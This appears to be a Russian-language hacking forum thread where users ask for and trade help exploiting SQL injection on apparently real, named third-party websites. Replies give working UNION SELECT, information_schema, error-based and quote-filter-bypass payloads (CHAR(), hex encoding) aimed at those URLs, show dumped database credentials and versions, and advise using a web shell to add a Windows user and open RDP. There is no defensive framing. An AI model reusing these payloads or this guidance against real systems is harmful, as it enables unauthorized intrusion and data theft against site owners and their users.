когда браузер будет у них интерпретировать то будет запрашывать картинку с сайта где скуль .


Эм, нам откуда знать, упадёт он или нет? Смотря сколько человек посмотрит картинку на форуме и какой сервер у сайта.

http://www.aghamyan.am/biography.php?form_id=2'a

nekak ne moqu nayti columns..

pojalusta pomoqite..

nekak ne moqu nayti columns..

pojalusta pomoqite..

а я никак не могу инъекцию там найти..

мысль улавливаешь?

nekak ne moqu nayti columns..

pojalusta pomoqite..


как бы там только раскрытие путей.
http://www.aghamyan.am/biography.php?form_id[]=6

может кто поможет никак не могу обходит филтрацию редирект идет ((

http://investorshub.advfn.com/boards/boards_moderated.asp?user=-177571'+order+by+1{

http://www.worstpreviews.com/headline2.php?id=16149'
Подскажите, как раскрутить.

http://www.worstpreviews.com/headline2.php?id=16149'
Подскажите, как раскрутить.
http://www.worstpreviews.com/headline2.php?id=-16149+union+select+1,concat_ws(0x3a,user(),version (),database()),3,4,5,6,7,8

http://www.worstpreviews.com/headline2.php?id=-16149+union+select+1,unhex(hex(user())),3,4,5,6,7, 8

может кто поможет никак не могу обходит филтрацию редирект идет ((
ну спс за ответы ((

Может не туда конечно пишу. Скажите почему не пингуется главная машина в сети (192.168.0.1). Все 40 компьютеров в сети пингуются, а сервак ни в какую. Что он сделал чтобы не пинговалось? И можно ли как нибудь это одолеть?

Может не туда конечно пишу. Скажите почему не пингуется главная машина в сети (192.168.0.1). Все 40 компьютеров в сети пингуются, а сервак ни в какую. Что он сделал чтобы не пинговалось? И можно ли как нибудь это одолеть?
ИМХО
если сеть работает, то это гон, что сервер не пингуеться
В любом случаи сервер должен пинговаться

ИМХО
если сеть работает, то это гон, что сервер не пингуеться
В любом случаи сервер должен пинговаться
а в чем проблема зарезать ICMP трафик файрволом?

а в чем проблема зарезать ICMP трафик файрволом?
А смысл?
Я так понимаю, ICMP используется для передачи сообщений об ошибках, возникших при передаче данных.

А смысл?
Я так понимаю, ICMP используется для передачи сообщений об ошибках, возникших при передаче данных.
а пинги по твоему это не трафик? "пинги" это и есть icmp пакеты, и отрубается это легко как и сказал oRb

а пинги по твоему это не трафик? "пинги" это и есть icmp пакеты, и отрубается это легко как и сказал oRb
Ну если нет пинга -> трафика -> ICMP пакетов, значит нет ответа от сервера?
Или я не так понял...?

как узнать какие столбцы в таблице?
http://site.com/uid=1+union+select+1,2,3,table_name+from+informati on_schema.tables-- Узнаем таблицы.

http://site/uid=-1 UNION SELECT 1,2,3, COLUMN_NAME,5,6 FROM INFORMATION_SCHEMA.COLUMNS-- А так по идее название столбцов?

как узнать какие столбцы в таблице?
http://site.com/uid=1+union+select+1,2,3,table_name+from+informati on_schema.tables-- Узнаем таблицы.

http://site/uid=-1 UNION SELECT 1,2,3, COLUMN_NAME,5,6 FROM INFORMATION_SCHEMA.COLUMNS-- А так по идее название столбцов?
Union+select+column_name+from+information_schema.c olumns+where+table_name='table'

Пробовал, тоже не получается, просто ошибка: You have an error in your SQL synta......

на ковычки ругаеться скорей всего (в тексте ошибки точней сказано), пробуй talbe перевести в char

Union+select+column_name+from+information_schema.c olumns+where+table_name='table'

вообще твои запросы покатит не везде
+where+table_name='table'
реал покатит перевести в Hex - кодировку
+where+table_name=0x7461626c65
где 0x7461626c65 = table

З.Ы. а еще можно попытать счастье угадывая поля :(

Union+select+column_name+from+information_schema.c olumns+where+table_name='table'

скорее всего фильтруются кавычки, и на этот случай, специально для нас :) разработчики придумали функцию CHAR(), которой необходимо передать ASCII код символа, или несколько ASCII кодов через запятую.

Допустим, запрос SELECT CHAR(117,115,101,114,115) вернет тебе users, кавычки при этом туда вбивать не надо.

PS. А вот тебе скриптик, чтобы автоматом генерить эту комбинацию.


<form action='' method='POST'>
<input type='text' name='ascii' />
<input type='submit' name='gogo' />
</form>
<hr/>
<?php
if($_POST['gogo'] && $_POST['ascii'] != ''){
for($i = 0; $i < strlen($_POST['ascii']); $i++){
$arr[] = substr($_POST['ascii'], $i, 1);
}
$str = 'char(';
foreach($arr as $k=>$v) {
if($k == count($arr) - 1){ $str .= ord($v).')'; break; }
$str .= ord($v).',';
}
echo $str;
}
?>

скорее всего фильтруются кавычки, и на этот случай, специально для нас :) разработчики придумали функцию CHAR(), которой необходимо передать ASCII код символа, или несколько ASCII кодов через запятую.

Допустим, запрос SELECT CHAR(117,115,101,114,115) вернет тебе users, кавычки при этом туда вбивать не надо.

PS. А вот тебе скриптик, чтобы автоматом генерить эту комбинацию.


<form action='' method='POST'>
<input type='text' name='ascii' />
<input type='submit' name='gogo' />
</form>
<hr/>
<?php
if($_POST['gogo'] && $_POST['ascii'] != ''){
for($i = 0; $i < strlen($_POST['ascii']); $i++){
$arr[] = substr($_POST['ascii'], $i, 1);
}
$str = 'char(';
foreach($arr as $k=>$v) {
if($k == count($arr) - 1){ $str .= ord($v).')'; break; }
$str .= ord($v).',';
}
echo $str;
}
?>
И вместо всего этого понта-поста достаточно было написать
<?php echo '0x'.bin2hex($_GET['c']);?>

Все. разобрался, всем большое спасибо!

Ну если нет пинга -> трафика -> ICMP пакетов, значит нет ответа от сервера?
Или я не так понял...?
Допустим у firewall ( outpost ) есть режим анонимности, когда он блокирует ICMP трафик, инет же работает))
Ты же не собираешься отправлять пакеты через ICMP туннель)

']Допустим у firewall ( outpost ) есть режим анонимности, когда он блокирует ICMP трафик, инет же работает))
Ты же не собираешься отправлять пакеты через ICMP туннель)
я уже разобрался )
---------
Как раскрутить sql-inj в поле для поиска, просто первый раз сталкиваюсь с этой проблемой :confused:

я уже разобрался )
---------
Как раскрутить sql-inj в поле для поиска, просто первый раз сталкиваюсь с этой проблемой :confused:
Все зависит от запроса. Ссылку в студию.

http://java.vg/index.php?id=0&ac=search

блин кто нит помогите раскрутит http://investorshub.advfn.com/boards/boards_moderated.asp?user=-177571'+order+by+1{
никак не могу составит правильный запрос

http://java.vg/index.php?id=0&ac=search
Вводишь
aaa')/**/Union/**/Select/**/1,2,concat_ws(0x3a,database(),user(),version()),4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18#
javavg games:javavg@localhost:5.0.67-percona-highperf-b7-log

блин кто нит помогите раскрутит http://investorshub.advfn.com/boards/boards_moderated.asp?user=-177571'+order+by+1{
никак не могу составит правильный запрос
use it:
investorshub.advfn.com/boards/commentary.asp?article=(%53elect+top+1+table_name+ from+information_schema.tables)

Вводишь

javavg games:javavg@localhost:5.0.67-percona-highperf-b7-log
Если нетрудно, можеш обьяснить, почему там скобка?
aaa')

Если нетрудно, можеш обьяснить, почему там скобка?
aaa')
Как я уже сказал, запрос такой...
К примеру такой:
SELECT * FROM `table` WHERE `field` IN ('$str')

Здравствуйте помогите пожалуйста с sql инъекцией http://kirovmag.ru/catalog/subcat6/index6.php?str=-2&gis=5
ничего в нете путевого ненашел!
недели две себе уже жопу рву из за этого!

Здравствуйте помогите пожалуйста с sql инъекцией http://kirovmag.ru/catalog/subcat6/index6.php?str=-2&gis=5
ничего в нете путевого ненашел!
недели две себе уже жопу рву из за этого!
Инъекция в LIMIT'e.
Раскрутить невозможно.

есть что то типа такого:

<?php
echo $_SERVER['DOCUMENT_ROOT'];
?>

я непойму почему неполучаеться переобределить переменую, пробывал так index.php?_SERVER[DOCUMENT_ROOT]=qwerty
register_globals стоит в положении On

Инъекция в LIMIT'e.
Раскрутить невозможно.
там соседняя переменная поле сортировки задает
kirovmag.ru/catalog/subcat6/index6.php?sort=(1,2)=(select+count(*),concat((sel ect+table_name+from+information_schema.tables+limi t+1),0x3a,floor(rand()*2))+from+information_schema .tables+group+by+2+limit+1)--+1

use it:
спс помогло ))

Возможно ли подключиться к дедику по RDP имея веб шелл.?
ОС win
На все диски права админа имею
Или как добавить нового пользоателя ?

Возможно ли подключиться к дедику по RDP имея веб шелл.?
ОС win
На все диски права админа имею
Или как добавить нового пользоателя ?

да, можно.
как добавить, куча статей в нете. Создает BAT файл и исполняешь его. Открыть RDP - это в реестре. Так же полно статей в нете.

Потому что это елемент масива сервер как ты его переопределиш (в котором путь к папке где скрипты лежат ), я встречал здесь что то TOXA писал, в хедер как то можно было... но это если допустим при редиректе... что то типо такого
тынц
По линку что ты дал немного нето. Это реально, я ж это непридумал сам. Реальные примеры в багтраках встречаються. Пример из реальной жизни:
http://www.exploit-db.com/exploits/10421
в начале imagezoom.php

require_once($_SERVER["DOCUMENT_ROOT"]."/cms_rc_frontend.php");
......